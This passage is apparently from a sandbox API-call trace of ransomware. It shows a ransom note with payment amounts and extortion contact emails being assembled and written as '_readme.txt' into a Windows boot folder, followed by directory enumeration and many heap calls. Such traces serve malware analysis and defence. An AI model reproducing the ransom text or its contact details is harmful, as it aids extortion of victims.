decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.190] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.191] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.191] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.192] CloseHandle (hObject=0x5c8) returned 1 [0094.192] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.192] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.192] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.193] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.193] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.193] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1ae07a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1ae07a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.193] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.193] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1ae07a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1ae07a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.193] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.193] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1ae07a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1ae07a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1ae07a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.193] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1ae07a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1ae07a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1ae07a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.193] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.193] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.193] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.193] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0094.193] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.195] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.196] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.200] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.201] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.202] RtlAllocateHeap (HeapHandle=0x630000, 